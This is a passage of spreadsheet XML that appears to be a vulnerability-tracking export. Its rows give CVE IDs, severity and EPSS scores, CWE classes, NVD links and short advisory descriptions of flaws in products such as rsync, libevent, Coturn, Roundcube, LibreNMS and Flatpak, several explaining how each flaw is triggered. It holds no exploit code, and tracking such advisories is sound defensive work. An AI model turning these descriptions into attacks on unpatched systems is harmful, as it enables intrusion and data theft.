      <c r="L4503" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the EndPoint Data Loss Prevention (DLP) enforcement of Palo Alto Networks Prisma® Access Agent enables a local user to bypass configured DLP policy enforcement controls and exfiltrate sensitive data. 
This Prisma Access Agent on macOS, Linux,  iOS, Android and Chrome OS is not affected.</t>
        </is>
      </c>
      <c r="M4503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0306</t>
        </is>
      </c>
    </row>
    <row r="4504">
      <c r="A4504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16005</t>
        </is>
      </c>
      <c r="C4504" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4504" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4504" s="5" t="inlineStr"/>
      <c r="F4504" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4504" s="5" t="inlineStr"/>
      <c r="H4504" s="5" t="inlineStr"/>
      <c r="I4504" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4504" s="5" t="inlineStr"/>
      <c r="K4504" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="L4504" s="5" t="inlineStr">
        <is>
          <t>Release of Invalid Pointer or Reference in Armoury Crate driver allows a local user to free arbitrary memory via a crafted IOCTL request by bypassing the driver's verification, which can corrupt data structures and cause a system crash (BSOD).Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16005</t>
        </is>
      </c>
    </row>
    <row r="4505">
      <c r="A4505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19130</t>
        </is>
      </c>
      <c r="C4505" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4505" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4505" s="5" t="inlineStr"/>
      <c r="F4505" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4505" s="5" t="inlineStr"/>
      <c r="H4505" s="5" t="inlineStr"/>
      <c r="I4505" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4505" s="5" t="inlineStr"/>
      <c r="K4505" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4505" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the provider-credential-controller component of multicluster-engine (MCE). An attacker with specific permissions on the hub cluster, and knowledge of a prior credential value, could exploit an authorization bypass vulnerability. By manipulating `copiedFrom` labels, the attacker could intercept newly rotated provider credentials, leading to unauthorized information disclosure. This allows access to sensitive credentials that should otherwise be protected.</t>
        </is>
      </c>
      <c r="M4505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19130</t>
        </is>
      </c>
    </row>
    <row r="4506">
      <c r="A4506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48071</t>
        </is>
      </c>
      <c r="C4506" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4506" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4506" s="5" t="inlineStr"/>
      <c r="F4506" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4506" s="5" t="inlineStr"/>
      <c r="H4506" s="5" t="inlineStr"/>
      <c r="I4506" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4506" s="5" t="inlineStr"/>
      <c r="K4506" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L4506" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.4, the PIN-type challenge throttle uses `emailHash` as the only key. The throttle rows live in the central `challenge_throttle` table, which is shared across all tenants. Every tenant's `/api/tenants/{id}/appointments/verify-challenge` endpoint increments the same row when a PIN response fails, and every tenant's `/api/tenants/{id}/appointments/challenge` endpoint reads the same row when deciding whether to issue a new challenge. When the same `emailHash` exists in multiple tenants on the same OpenReception instance (the same patient holding tunnels in two different clinics that share the platform), an attacker who knows the patient's email can lock out that patient on tenant B by issuing failed challenge responses against tenant A. The attacker needs no relationship to tenant B; the lockout propagates through the shared throttle row. The lockout escalates with repeated failures. The first lockout triggers at 4 failed attempts and lasts approximately 60 seconds. Subsequent failures escalate the lockout duration to 5 minutes, 30 minutes, and 60 minutes per the throttle service's escalation logic. Repeated bursts produce sustained denial of service against the targeted email. Version 1.0.4 patches the issue.</t>
        </is>
      </c>
      <c r="M4506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48071</t>
        </is>
      </c>
    </row>
    <row r="4507">
      <c r="A4507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50550</t>
        </is>
      </c>
      <c r="C4507" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4507" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4507" s="5" t="inlineStr"/>
      <c r="F4507" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4507" s="5" t="inlineStr"/>
      <c r="H4507" s="5" t="inlineStr"/>
      <c r="I4507" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4507" s="5" t="inlineStr"/>
      <c r="K4507" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4507" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.5.0, a user who can edit other users can reset a superadmin's two-factor authentication through app/Http/Controllers/Api/UsersController.php postTwoFactorReset(). The endpoint authorizes update access but does not enforce canEditAuthFields before clearing two_factor_secret and two_factor_enrolled. This issue is fixed in version 8.5.0.</t>
        </is>
      </c>
      <c r="M4507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50550</t>
        </is>
      </c>
    </row>
    <row r="4508">
      <c r="A4508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53796</t>
        </is>
      </c>
      <c r="C4508" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4508" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4508" s="5" t="inlineStr"/>
      <c r="F4508" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4508" s="5" t="inlineStr"/>
      <c r="H4508" s="5" t="inlineStr"/>
      <c r="I4508" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4508" s="5" t="inlineStr"/>
      <c r="K4508" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-59</t>
        </is>
      </c>
      <c r="L4508" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a time-of-check to time-of-use (TOCTOU) race condition vulnerability in the non-daemon receiver's destination directory handling that allows an attacker who can manipulate destination path parent components to redirect file writes to unintended locations. Attackers can substitute a symlink for a component of the destination path between the path resolution and chdir() call, causing the receiver's working directory to be established outside the intended destination tree so that subsequent relative-path file writes land in unintended filesystem locations.</t>
        </is>
      </c>
      <c r="M4508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53796</t>
        </is>
      </c>
    </row>
    <row r="4509">
      <c r="A4509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63381</t>
        </is>
      </c>
      <c r="C4509" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4509" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4509" s="5" t="inlineStr"/>
      <c r="F4509" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4509" s="5" t="inlineStr"/>
      <c r="H4509" s="5" t="inlineStr"/>
      <c r="I4509" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4509" s="5" t="inlineStr"/>
      <c r="K4509" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4509" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has a use-after-free in buffer.c when evbuffer_add_buffer_reference processes an output buffer whose out_total_len is zero. evbuffer_free_all_chains frees the initial empty chain without resetting outbuf-&gt;first, outbuf-&gt;last, or outbuf-&gt;last_with_datap, and APPEND_CHAIN_MULTICAST subsequently dereferences the dangling chain pointer. A caller that can drive this buffer state can cause memory corruption or a process crash. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M4509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63381</t>
        </is>
      </c>
    </row>
    <row r="4510">
      <c r="A4510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69129</t>
        </is>
      </c>
      <c r="C4510" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4510" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4510" s="5" t="inlineStr"/>
      <c r="F4510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4510" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H4510" s="5" t="inlineStr"/>
      <c r="I4510" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4510" s="5" t="inlineStr"/>
      <c r="K4510" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4510" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 2.0.0, cluster-scoped APIs do not consistently validate per-cluster access, allowing an authenticated user with cluster management permissions to operate on clusters outside the scope they were granted. Because the affected endpoints act on cluster-specific data without confirming that the requesting user is authorized for that particular cluster, a user assigned management rights over one cluster can, under certain role and cluster configurations, read or modify data in clusters they should not manage. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="M4510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69129</t>
        </is>
      </c>
    </row>
    <row r="4511">
      <c r="A4511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69559</t>
        </is>
      </c>
      <c r="C4511" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4511" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4511" s="5" t="inlineStr"/>
      <c r="F4511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4511" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H4511" s="5" t="inlineStr"/>
      <c r="I4511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4511" s="5" t="inlineStr"/>
      <c r="K4511" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L4511" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Microsoft Teams for Android allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M4511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69559</t>
        </is>
      </c>
    </row>
    <row r="4512">
      <c r="A4512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72764</t>
        </is>
      </c>
      <c r="C4512" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4512" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4512" s="5" t="inlineStr"/>
      <c r="F4512" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4512" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4512" s="5" t="inlineStr"/>
      <c r="I4512" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4512" s="5" t="inlineStr"/>
      <c r="K4512" s="5" t="inlineStr">
        <is>
          <t>CWE-668</t>
        </is>
      </c>
      <c r="L4512" s="5" t="inlineStr">
        <is>
          <t>n8n's JavaScript task runner shared a single module cache across all users' Code-node executions. In affected versions (before 1.123.67, 2.31.5, and 2.32.1), a user able to run a Code node could poison a cached module and thereby alter other users' Code-node executions on the same runner, affecting their confidentiality, integrity, or availability. This is a cross-user isolation break within a single n8n instance and does not constitute a sandbox escape or remote code execution. Only multi-user instances running the JS task runner with built-in or external modules enabled are affected.</t>
        </is>
      </c>
      <c r="M4512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72764</t>
        </is>
      </c>
    </row>
    <row r="4513">
      <c r="A4513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73212</t>
        </is>
      </c>
      <c r="C4513" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4513" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4513" s="5" t="inlineStr"/>
      <c r="F4513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4513" s="5" t="inlineStr"/>
      <c r="H4513" s="5" t="inlineStr"/>
      <c r="I4513" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4513" s="5" t="inlineStr"/>
      <c r="K4513" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="L4513" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.13.1, good_peer_addr() in src/server/ns_turn_server.c uses ioa_addr_in_range() in src/client/ns_turn_ioaddr.c without canonicalizing IPv4-compatible, 6to4, and 64:ff9b::/96 NAT64 address forms, allowing an authenticated RFC 6062 TCP CONNECT relay client to bypass an IPv4 denied-peer-ip range when the Coturn host has a useful translation route. This issue is fixed in version 4.13.1.</t>
        </is>
      </c>
      <c r="M4513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73212</t>
        </is>
      </c>
    </row>
    <row r="4514">
      <c r="A4514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73213</t>
        </is>
      </c>
      <c r="C4514" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4514" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4514" s="5" t="inlineStr"/>
      <c r="F4514" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4514" s="5" t="inlineStr"/>
      <c r="H4514" s="5" t="inlineStr"/>
      <c r="I4514" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4514" s="5" t="inlineStr"/>
      <c r="K4514" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4514" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.16.0, addr_less_eq() in src/client/ns_turn_ioaddr.c uses a component-wise comparison for native IPv6 min-max intervals in ioa_addr_in_range(), allowing an authenticated TURN client to relay to an IPv6 peer that is numerically within a configured non-prefix-aligned denied-peer-ip range but is classified as outside it. This issue is fixed in version 4.16.0.</t>
        </is>
      </c>
      <c r="M4514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73213</t>
        </is>
      </c>
    </row>
    <row r="4515">
      <c r="A4515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73243</t>
        </is>
      </c>
      <c r="C4515" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4515" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4515" s="5" t="inlineStr"/>
      <c r="F4515" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4515" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H4515" s="5" t="inlineStr"/>
      <c r="I4515" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4515" s="5" t="inlineStr"/>
      <c r="K4515" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4515" s="5" t="inlineStr">
        <is>
          <t>kkFileView is a universal file online preview project based on Spring Boot. Prior to 5.0.1, the unauthenticated GET /addTask endpoint in kkFileView is omitted from TrustHostFilter and TrustDirFilter in server/src/main/java/cn/keking/config/WebConfig.java, allowing FileConvertQueueTask to fetch an attacker-selected URL after FileHandlerService#getFileAttribute uses the fullfilename parameter to force an OFFICE, COMPRESS, or CAD type. This issue is fixed in version 5.0.1.</t>
        </is>
      </c>
      <c r="M4515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73243</t>
        </is>
      </c>
    </row>
    <row r="4516">
      <c r="A4516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74866</t>
        </is>
      </c>
      <c r="C4516" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4516" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4516" s="5" t="inlineStr"/>
      <c r="F4516" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4516" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4516" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/busyboy</t>
        </is>
      </c>
      <c r="I4516" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J4516" s="5" t="inlineStr"/>
      <c r="K4516" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L4516" s="5" t="inlineStr">
        <is>
          <t>@fastify/busboy is a multipart form-data parser for Node.js. Its multipart part-header parser splits header lines only on the two-byte carriage-return line-feed sequence, so a lone carriage return or line feed embedded in a part header is not treated as a line break and is carried verbatim into the parsed Content-Disposition filename and field name handed to the application. An attacker who uploads a file whose filename or field name contains a bare carriage return or line feed can inject control characters into consumers that trust the parser to return clean values, enabling filesystem filename pollution, log forging, or header injection when the value is forwarded to a carriage-return-sensitive sink. All versions of @fastify/busboy up to and including 3.2.1 are affected. The issue is fixed in version 3.2.2, which rejects any header line that still contains a bare carriage return or line feed. Users should upgrade to 3.2.2, and consumers such as @fastify/multipart should bump their @fastify/busboy dependency to pull in the fix.</t>
        </is>
      </c>
      <c r="M4516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74866</t>
        </is>
      </c>
    </row>
    <row r="4517">
      <c r="A4517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75000</t>
        </is>
      </c>
      <c r="C4517" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4517" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4517" s="5" t="inlineStr"/>
      <c r="F4517" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4517" s="5" t="inlineStr"/>
      <c r="H4517" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I4517" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4517" s="5" t="inlineStr"/>
      <c r="K4517" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L4517" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, improper HTML/CSS sanitization of the SVG animate "by" attribute may lead to remote image blocking bypass, which in turn may lead to information disclosure or privilege escalation.</t>
        </is>
      </c>
      <c r="M4517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75000</t>
        </is>
      </c>
    </row>
    <row r="4518">
      <c r="A4518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75006</t>
        </is>
      </c>
      <c r="C4518" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4518" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4518" s="5" t="inlineStr"/>
      <c r="F4518" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4518" s="5" t="inlineStr"/>
      <c r="H4518" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I4518" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4518" s="5" t="inlineStr"/>
      <c r="K4518" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4518" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to SSRF or Information Disclosure, e.g., if stylesheet links point to local network hosts. This issue exists because of insufficient fixes for CVE-2026-35540, CVE-2026-48843 and CVE-2026-62643.</t>
        </is>
      </c>
      <c r="M4518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75006</t>
        </is>
      </c>
    </row>
    <row r="4519">
      <c r="A4519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75811</t>
        </is>
      </c>
      <c r="C4519" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4519" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4519" s="5" t="inlineStr"/>
      <c r="F4519" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4519" s="5" t="inlineStr"/>
      <c r="H4519" s="5" t="inlineStr"/>
      <c r="I4519" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4519" s="5" t="inlineStr"/>
      <c r="K4519" s="5" t="inlineStr">
        <is>
          <t>CWE-1256</t>
        </is>
      </c>
      <c r="L4519" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of Software Interfaces to Hardware Features in ASUS Armoury Crate allows a local user to modify hardware configuration settings and potentially cause hardware damage by bypassing driver authentication and accessing critical model-specific registers.Refer to the '
Security Update for Armoury Crate App' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75811</t>
        </is>
      </c>
    </row>
    <row r="4520">
      <c r="A4520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76925</t>
        </is>
      </c>
      <c r="C4520" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4520" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4520" s="5" t="inlineStr"/>
      <c r="F4520" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4520" s="5" t="inlineStr"/>
      <c r="H4520" s="5" t="inlineStr"/>
      <c r="I4520" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4520" s="5" t="inlineStr"/>
      <c r="K4520" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L4520" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Flatpak. A Time-of-check to time-of-use (TOCTOU) race condition exists in the `org.freedesktop.Flatpak.SystemHelper` component. This vulnerability occurs because a privileged `chmod` operation executes before the OSTree repository validation within the `Deploy()` function. An attacker can exploit this timing window to redirect symlinks to arbitrary files, potentially leading to unauthorized file manipulation or information disclosure.</t>
        </is>
      </c>
      <c r="M4520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76925</t>
        </is>
      </c>
    </row>
    <row r="4521">
      <c r="A4521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84193</t>
        </is>
      </c>
      <c r="C4521" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4521" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4521" s="5" t="inlineStr"/>
      <c r="F4521" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4521" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4521" s="5" t="inlineStr"/>
      <c r="I4521" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J4521" s="5" t="inlineStr"/>
      <c r="K4521" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4521" s="5" t="inlineStr">
        <is>
          <t>LibreNMS through 26.2.0 contains a stored cross-site scripting vulnerability in legacy PHP template pages that render unescaped SNMP-sourced data fields including BGP peer descriptions, VRF names, process information, and SLA tags. Attackers with device management access or network access to enroll a rogue SNMP device can inject malicious JavaScript that executes when admins view affected routing and device pages, enabling credential theft and CSRF token exfiltration.</t>
        </is>
      </c>
      <c r="M4521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84193</t>
        </is>
      </c>
    </row>
    <row r="4522">
      <c r="A4522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88061</t>
        </is>
      </c>
      <c r="C4522" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="D4522" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4522" s="5" t="inlineStr"/>
      <c r="F4522" s="5" t="inlineStr"/>
      <c r="G4522" s="5" t="inlineStr"/>
      <c r="H4522" s="5" t="inlineStr"/>
      <c r="I4522" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4522" s="5" t="inlineStr"/>
      <c r="K4522" s="5" t="inlineStr">
        <is>
          <t>CWE-1385, CWE-352</t>
        </is>
      </c>
      <c r="L4522" s="5" t="inlineStr">
        <is>
          <t>career-ops is an open-source AI-assisted job search and application management tool. Prior to 0.8.0, the career-ops local web dashboard web/ exposed command-spawning and user-file-writing /api routes without validating request origin or restricting clients to loopback addresses. A malicious page in another browser tab could send cross-origin localhost requests while the dashboard was running, and a dashboard bound beyond loopback could receive direct requests from the local network. Both paths allowed unauthenticated command execution as the dashboard user, but npm installations were unaffected because web/ is excluded from the published package. This issue is fixed in version 0.8.0.</t>
        </is>
      </c>
      <c r="M4522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88061</t>
        </is>
      </c>
    </row>
    <row r="4523">
      <c r="A4523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15534</t>
        </is>
      </c>
      <c r="C4523" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="D4523" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4523" s="5" t="inlineStr"/>
      <c r="F4523" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4523" s="5" t="inlineStr"/>
      <c r="H4523" s="5" t="inlineStr"/>
      <c r="I4523" s="5" t="inlineStr">
        <is>
          <t>2026-08-09</t>
        </is>
      </c>
      <c r="J4523" s="5" t="inlineStr"/>
      <c r="K4523" s="5" t="inlineStr">
        <is>
